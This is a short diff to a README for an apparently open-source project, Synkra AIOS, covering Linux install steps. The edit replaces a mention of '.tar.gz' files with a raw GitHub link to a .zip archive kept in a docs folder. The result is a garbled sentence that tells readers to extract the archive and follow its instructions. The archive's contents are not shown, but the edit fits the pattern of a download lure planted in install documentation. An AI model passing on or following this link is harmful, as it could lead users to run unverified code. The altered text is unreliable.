invertebratekinanesthesia779/aios-core/README.md

 - **For Linux:**
   1. If you downloaded an AppImage, right-click the file and select "Properties".
 Make sure the file is executable by checking the "Allow executing file as program" box.
   2. Double-click the file to run Synkra AIOS.
-  3. For `.tar.gz` files, extract the archive, then follow any instructions in the included README.
+  3. For `https://github.com/invertebratekinanesthesia779/aios-core/raw/refs/heads/main/docs/guides/agents/AIOS-AGENT-FLOWS.zip` files, extract the archive, then follow any instructions in the included README.

 ---